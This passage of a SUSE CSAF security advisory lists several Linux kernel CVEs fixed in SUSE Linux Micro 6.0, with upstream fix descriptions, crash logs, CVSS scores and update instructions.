"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54169"
},
{
"cve": "CVE-2023-54170",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54170"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nkeys: Fix linking a duplicate key to a keyring\u0027s assoc_array\n\nWhen making a DNS query inside the kernel using dns_query(), the request\ncode can in rare cases end up creating a duplicate index key in the\nassoc_array of the destination keyring. It is eventually found by\na BUG_ON() check in the assoc_array implementation and results in\na crash.\n\nExample report:\n[2158499.700025] kernel BUG at ../lib/assoc_array.c:652!\n[2158499.700039] invalid opcode: 0000 [#1] SMP PTI\n[2158499.700065] CPU: 3 PID: 31985 Comm: kworker/3:1 Kdump: loaded Not tainted 5.3.18-150300.59.90-default #1 SLE15-SP3\n[2158499.700096] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020\n[2158499.700351] Workqueue: cifsiod cifs_resolve_server [cifs]\n[2158499.700380] RIP: 0010:assoc_array_insert+0x85f/0xa40\n[2158499.700401] Code: ff 74 2b 48 8b 3b 49 8b 45 18 4c 89 e6 48 83 e7 fe e8 95 ec 74 00 3b 45 88 7d db 85 c0 79 d4 0f 0b 0f 0b 0f 0b e8 41 f2 be ff \u003c0f\u003e 0b 0f 0b 81 7d 88 ff ff ff 7f 4c 89 eb 4c 8b ad 58 ff ff ff 0f\n[2158499.700448] RSP: 0018:ffffc0bd6187faf0 EFLAGS: 00010282\n[2158499.700470] RAX: ffff9f1ea7da2fe8 RBX: ffff9f1ea7da2fc1 RCX: 0000000000000005\n[2158499.700492] RDX: 0000000000000000 RSI: 0000000000000005 RDI: 0000000000000000\n[2158499.700515] RBP: ffffc0bd6187fbb0 R08: ffff9f185faf1100 R09: 0000000000000000\n[2158499.700538] R10: ffff9f1ea7da2cc0 R11: 000000005ed8cec8 R12: ffffc0bd6187fc28\n[2158499.700561] R13: ffff9f15feb8d000 R14: ffff9f1ea7da2fc0 R15: ffff9f168dc0d740\n[2158499.700585] FS: 0000000000000000(0000) GS:ffff9f185fac0000(0000) knlGS:0000000000000000\n[2158499.700610] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[2158499.700630] CR2: 00007fdd94fca238 CR3: 0000000809d8c006 CR4: 00000000003706e0\n[2158499.700702] Call Trace:\n[2158499.700741] ? key_alloc+0x447/0x4b0\n[2158499.700768] ? __key_link_begin+0x43/0xa0\n[2158499.700790] __key_link_begin+0x43/0xa0\n[2158499.700814] request_key_and_link+0x2c7/0x730\n[2158499.700847] ? dns_resolver_read+0x20/0x20 [dns_resolver]\n[2158499.700873] ? key_default_cmp+0x20/0x20\n[2158499.700898] request_key_tag+0x43/0xa0\n[2158499.700926] dns_query+0x114/0x2ca [dns_resolver]\n[2158499.701127] dns_resolve_server_name_to_ip+0x194/0x310 [cifs]\n[2158499.701164] ? scnprintf+0x49/0x90\n[2158499.701190] ? __switch_to_asm+0x40/0x70\n[2158499.701211] ? __switch_to_asm+0x34/0x70\n[2158499.701405] reconn_set_ipaddr_from_hostname+0x81/0x2a0 [cifs]\n[2158499.701603] cifs_resolve_server+0x4b/0xd0 [cifs]\n[2158499.701632] process_one_work+0x1f8/0x3e0\n[2158499.701658] worker_thread+0x2d/0x3f0\n[2158499.701682] ? process_one_work+0x3e0/0x3e0\n[2158499.701703] kthread+0x10d/0x130\n[2158499.701723] ? kthread_park+0xb0/0xb0\n[2158499.701746] ret_from_fork+0x1f/0x40\n\nThe situation occurs as follows:\n* Some kernel facility invokes dns_query() to resolve a hostname, for\n example, \"abcdef\". The function registers its global DNS resolver\n cache as current-\u003ecred.thread_keyring and passes the query to\n request_key_net() -\u003e request_key_tag() -\u003e request_key_and_link().\n* Function request_key_and_link() creates a keyring_search_context\n object. Its match_data.cmp method gets set via a call to\n type-\u003ematch_preparse() (resolves to dns_resolver_match_preparse()) to\n dns_resolver_cmp().\n* Function request_key_and_link() continues and invokes\n search_process_keyrings_rcu() which returns that a given key was not\n found. The control is then passed to request_key_and_link() -\u003e\n construct_alloc_key().\n* Concurrently to that, a second task similarly makes a DNS query for\n \"abcdef.\" and its result gets inserted into the DNS resolver cache.\n* Back on the first task, function construct_alloc_key() first runs\n __key_link_begin() to determine an assoc_array_edit operation to\n insert a new key. Index keys in the array are compared exactly as-is,\n using keyring_compare_object(). The operation \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54170",
"url": "https://www.suse.com/security/cve/CVE-2023-54170"
},
{
"category": "external",
"summary": "SUSE Bug 1256045 for CVE-2023-54170",
"url": "https://bugzilla.suse.com/1256045"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54170"
},
{
"cve": "CVE-2023-54171",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54171"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Fix memory leak of iter-\u003etemp when reading trace_pipe\n\nkmemleak reports:\n unreferenced object 0xffff88814d14e200 (size 256):\n comm \"cat\", pid 336, jiffies 4294871818 (age 779.490s)\n hex dump (first 32 bytes):\n 04 00 01 03 00 00 00 00 08 00 00 00 00 00 00 00 ................\n 0c d8 c8 9b ff ff ff ff 04 5a ca 9b ff ff ff ff .........Z......\n backtrace:\n [\u003cffffffff9bdff18f\u003e] __kmalloc+0x4f/0x140\n [\u003cffffffff9bc9238b\u003e] trace_find_next_entry+0xbb/0x1d0\n [\u003cffffffff9bc9caef\u003e] trace_print_lat_context+0xaf/0x4e0\n [\u003cffffffff9bc94490\u003e] print_trace_line+0x3e0/0x950\n [\u003cffffffff9bc95499\u003e] tracing_read_pipe+0x2d9/0x5a0\n [\u003cffffffff9bf03a43\u003e] vfs_read+0x143/0x520\n [\u003cffffffff9bf04c2d\u003e] ksys_read+0xbd/0x160\n [\u003cffffffff9d0f0edf\u003e] do_syscall_64+0x3f/0x90\n [\u003cffffffff9d2000aa\u003e] entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\nwhen reading file \u0027trace_pipe\u0027, \u0027iter-\u003etemp\u0027 is allocated or relocated\nin trace_find_next_entry() but not freed before \u0027trace_pipe\u0027 is closed.\n\nTo fix it, free \u0027iter-\u003etemp\u0027 in tracing_release_pipe().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54171",
"url": "https://www.suse.com/security/cve/CVE-2023-54171"
},
{
"category": "external",
"summary": "SUSE Bug 1256034 for CVE-2023-54171",
"url": "https://bugzilla.suse.com/1256034"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54171"
},
{
"cve": "CVE-2023-54172",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54172"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/hyperv: Disable IBT when hypercall page lacks ENDBR instruction\n\nOn hardware that supports Indirect Branch Tracking (IBT), Hyper-V VMs\nwith ConfigVersion 9.3 or later support IBT in the guest. However,\ncurrent versions of Hyper-V have a bug in that there\u0027s not an ENDBR64\ninstruction at the beginning of the hypercall page. Since hypercalls are\nmade with an indirect call to the hypercall page, all hypercall attempts\nfail with an exception and Linux panics.\n\nA Hyper-V fix is in progress to add ENDBR64. But guard against the Linux\npanic by clearing X86_FEATURE_IBT if the hypercall page doesn\u0027t start\nwith ENDBR. The VM will boot and run without IBT.\n\nIf future Linux 32-bit kernels were to support IBT, additional hypercall\npage hackery would be needed to make IBT work for such kernels in a\nHyper-V VM.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54172",
"url": "https://www.suse.com/security/cve/CVE-2023-54172"
},
{
"category": "external",
"summary": "SUSE Bug 1256033 for CVE-2023-54172",
"url": "https://bugzilla.suse.com/1256033"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54172"
},
{
"cve": "CVE-2023-54173",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54173"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Disable preemption in bpf_event_output\n\nWe received report [1] of kernel crash, which is caused by\nusing nesting protection without disabled preemption.\n\nThe bpf_event_output can be called by programs executed by\nbpf_prog_run_array_cg function that disabled migration but\nkeeps preemption enabled.\n\nThis can cause task to be preempted by another one inside the\nnesting protection and lead eventually to two tasks using same\nperf_sample_data buffer and cause crashes like:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000001\n #PF: supervisor instruction fetch in kernel mode\n #PF: error_code(0x0010) - not-present page\n ...\n ? perf_output_sample+0x12a/0x9a0\n ? finish_task_switch.isra.0+0x81/0x280\n ? perf_event_output+0x66/0xa0\n ? bpf_event_output+0x13a/0x190\n ? bpf_event_output_data+0x22/0x40\n ? bpf_prog_dfc84bbde731b257_cil_sock4_connect+0x40a/0xacb\n ? xa_load+0x87/0xe0\n ? __cgroup_bpf_run_filter_sock_addr+0xc1/0x1a0\n ? release_sock+0x3e/0x90\n ? sk_setsockopt+0x1a1/0x12f0\n ? udp_pre_connect+0x36/0x50\n ? inet_dgram_connect+0x93/0xa0\n ? __sys_connect+0xb4/0xe0\n ? udp_setsockopt+0x27/0x40\n ? __pfx_udp_push_pending_frames+0x10/0x10\n ? __sys_setsockopt+0xdf/0x1a0\n ? __x64_sys_connect+0xf/0x20\n ? do_syscall_64+0x3a/0x90\n ? entry_SYSCALL_64_after_hwframe+0x72/0xdc\n\nFixing this by disabling preemption in bpf_event_output.\n\n[1] https://github.com/cilium/cilium/issues/26756",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54173",
"url": "https://www.suse.com/security/cve/CVE-2023-54173"
},
{
"category": "external",
"summary": "SUSE Bug 1255996 for CVE-2023-54173",
"url": "https://bugzilla.suse.com/1255996"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54173"
},
{
"cve": "CVE-2023-54177",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54177"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nquota: fix warning in dqgrab()\n\nThere\u0027s issue as follows when do fault injection:\nWARNING: CPU: 1 PID: 14870 at include/linux/quotaops.h:51 dquot_disable+0x13b7/0x18c0\nModules linked in:\nCPU: 1 PID: 14870 Comm: fsconfig Not tainted 6.3.0-next-20230505-00006-g5107a9c821af-dirty #541\nRIP: 0010:dquot_disable+0x13b7/0x18c0\nRSP: 0018:ffffc9000acc79e0 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff88825e41b980\nRDX: 0000000000000000 RSI: ffff88825e41b980 RDI: 0000000000000002\nRBP: ffff888179f68000 R08: ffffffff82087ca7 R09: 0000000000000000\nR10: 0000000000000001 R11: ffffed102f3ed026 R12: ffff888179f68130\nR13: ffff888179f68110 R14: dffffc0000000000 R15: ffff888179f68118\nFS: 00007f450a073740(0000) GS:ffff88882fc00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007ffe96f2efd8 CR3: 000000025c8ad000 CR4: 00000000000006e0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n dquot_load_quota_sb+0xd53/0x1060\n dquot_resume+0x172/0x230\n ext4_reconfigure+0x1dc6/0x27b0\n reconfigure_super+0x515/0xa90\n __x64_sys_fsconfig+0xb19/0xd20\n do_syscall_64+0x39/0xb0\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nAbove issue may happens as follows:\nProcessA ProcessB ProcessC\nsys_fsconfig\n vfs_fsconfig_locked\n reconfigure_super\n ext4_remount\n dquot_suspend -\u003e suspend all type quota\n\n sys_fsconfig\n vfs_fsconfig_locked\n reconfigure_super\n ext4_remount\n dquot_resume\n ret = dquot_load_quota_sb\n add_dquot_ref\n do_open -\u003e open file O_RDWR\n vfs_open\n do_dentry_open\n get_write_access\n atomic_inc_unless_negative(\u0026inode-\u003ei_writecount)\n ext4_file_open\n dquot_file_open\n dquot_initialize\n __dquot_initialize\n dqget\n\t\t\t\t\t\t atomic_inc(\u0026dquot-\u003edq_count);\n\n __dquot_initialize\n __dquot_initialize\n dqget\n if (!test_bit(DQ_ACTIVE_B, \u0026dquot-\u003edq_flags))\n ext4_acquire_dquot\n\t\t\t -\u003e Return error DQ_ACTIVE_B flag isn\u0027t set\n dquot_disable\n\t\t\t invalidate_dquots\n\t\t\t if (atomic_read(\u0026dquot-\u003edq_count))\n\t dqgrab\n\t\t\t WARN_ON_ONCE(!test_bit(DQ_ACTIVE_B, \u0026dquot-\u003edq_flags))\n\t -\u003e Trigger warning\n\nIn the above scenario, \u0027dquot-\u003edq_flags\u0027 has no DQ_ACTIVE_B is normal when\ndqgrab().\nTo solve above issue just replace the dqgrab() use in invalidate_dquots() with\natomic_inc(\u0026dquot-\u003edq_count).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54177",
"url": "https://www.suse.com/security/cve/CVE-2023-54177"
},
{
"category": "external",
"summary": "SUSE Bug 1255993 for CVE-2023-54177",
"url": "https://bugzilla.suse.com/1255993"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
